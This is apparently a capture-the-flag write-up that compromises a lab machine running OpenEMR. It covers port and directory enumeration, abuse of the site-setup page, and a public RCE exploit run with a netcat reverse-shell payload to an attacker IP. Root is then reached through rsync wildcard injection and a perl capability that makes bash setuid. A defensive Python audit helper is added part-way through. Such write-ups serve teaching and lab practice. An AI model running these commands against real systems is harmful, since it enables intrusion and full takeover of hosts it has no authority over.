Everything here is plotted!
nmap -sV -sC -T5 10.10.207.74
Nmap shows us 5 open ports. Each of them needs to be enumerated. We'll start with the FTP service.
The FTP service accepts the anonymous account.
You have to look inside .- then … and finally download the file you_are_determined.txt with the command:
Reading the file you_are_determined.txt:
We get a clue: there is a service that works with the admin account. It remains to find out which one.
Nmap already gave us the version. We will try to connect to the service with the admin account.
mysql -u admin -h 10.10.207.74 -P 5900
Access is possible without a password. However, there is nothing interesting inside the databases.
dirsearch -u 10.10.207.74 -x 403
We land on a page with what appears to be a base64-encoded string.
Same thing in its directory.
Both elements are just rabbit holes:
dGhpcyBtaWdodCBiZSBhIHVzZXJuYW1l === this might be a username
aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1kUXc0dzlXZ1hjUQ== === https://www.youtube.com/watch?v=dQw4w9WgXcQ
dirsearch -u 10.10.207.74:8890 -x 403
We get several interesting directories.
We land on a login page.
A Google search shows that versions 220.127.116.11 and 18.104.22.168 are vulnerable, but you have to be authenticated. We must therefore find a way to log in to the interface.
First, we will scan the website again, this time only under /portal.
dirsearch -u 10.10.207.74:8890/portal -x 403
There is a setup.php page that apparently allows us to set up a new site. After some Google research, there is also another page, admin.php, which gives us further information.
This is not a very simple step to set up. You have to think back to the accesses you found earlier. It took me a long time to understand…
You have to give the site a name and continue.
Choose the option: Have setup create the database.
And finally we arrive at the configuration page of the new site.
The information to change:
Server Host: 10.10.207.74
Server Port: 5900
Login Name: newuser
Password: whatever you want
Name for Root Account: admin (this is the account with which we connected to the SQL database)
Initial User: newsadmin
Initial User Password: whatever you want
Be careful: after clicking Continue, it can take up to 1 minute to get to the next step.
Now that we have credentials to log in to the OpenEMR application, it is possible to use the available exploits to obtain RCE.
Exploit to use: https://www.exploit-db.com/exploits/45161
Line 66 needs to be changed: put the name of the new site there.
Command to launch the exploit:
python2.7 45161.py -u admin -p password -c 'rm f;mkfifo f;cat f|/bin/sh -i 2>&1|nc 10.11.38.124 1234 > f' http://10.10.137.4:8890/portal/
Linpeas shows us a scheduled task that runs every minute.
There is a wildcard in the command line, which can be used to elevate privileges. Since the script backs up every element (*) present in config, we will create a file in this folder whose name forces rsync to execute the command we insert.
echo "cp /bin/bash /home/plot_admin/shell; chmod +s /home/plot_admin/shell" > shell.sh
touch -- "-e sh shell.sh"
Once the scheduled task has been executed, you must go to the /home/plot_admin folder and execute the new bash.
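From the defender's side, the trick above leaves two things an audit can catch: a filename in the globbed folder that begins with "-", and a setuid copy of a shell. The following Python helper is an added example (not part of the write-up); it builds a constructed temporary directory mirroring those artifacts, reports them, and shows the usual hardening of anchoring a bare wildcard with "./" so expansions can never be parsed as options. The cron line it rewrites is a constructed stand-in, since the write-up does not quote the real one.

```python
import os
import re
import stat
import tempfile


def option_like_names(directory):
    """Return filenames in `directory` that begin with '-'.

    When a cron job expands a bare '*' (e.g. `cd config && rsync -a * dest/`),
    such a name is passed to rsync as an option instead of a path.
    """
    return sorted(n for n in os.listdir(directory) if n.startswith("-"))


def setuid_files(directory):
    """Return regular files in `directory` with the setuid or setgid bit set."""
    found = []
    for name in os.listdir(directory):
        st = os.lstat(os.path.join(directory, name))
        if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
            found.append(name)
    return sorted(found)


def harden_glob(cmd):
    """Prefix every bare '*' word with './' so expanded names start with './'.

    A glob already anchored to a path (e.g. /etc/*) is left untouched.
    """
    return re.sub(r"(?<=\s)\*(?=\s|$)", "./*", cmd)


def demo():
    """Audit a constructed directory containing the two artifacts described above."""
    with tempfile.TemporaryDirectory() as d:
        # Constructed sample: an option-looking filename, a benign file, a setuid file.
        open(os.path.join(d, "-e sh shell.sh"), "w").close()
        open(os.path.join(d, "notes.txt"), "w").close()
        shell = os.path.join(d, "shell")
        open(shell, "w").close()
        os.chmod(shell, 0o4755)
        # Constructed stand-in for a vulnerable cron command line.
        return option_like_names(d), setuid_files(d), harden_glob("rsync -a * /backup/")


if __name__ == "__main__":
    names, suid, fixed = demo()
    print("option-like names:", names, "| setuid files:", suid, "| hardened:", fixed)
```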
Linpeas had already shown it: perl has capabilities set. The GTFOBins website explains how to use them to elevate privileges to root.
getcap -r / 2>/dev/null
Original command from GTFOBins:
./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
Modified command:
/usr/bin/perl -e 'chmod 7777, "/bin/bash"'
That's all, folks.
Thank you for taking the trouble to come to the site to read this write-up.
I hope you enjoyed it and that it taught you new things.
Feel free to leave a comment or share this article.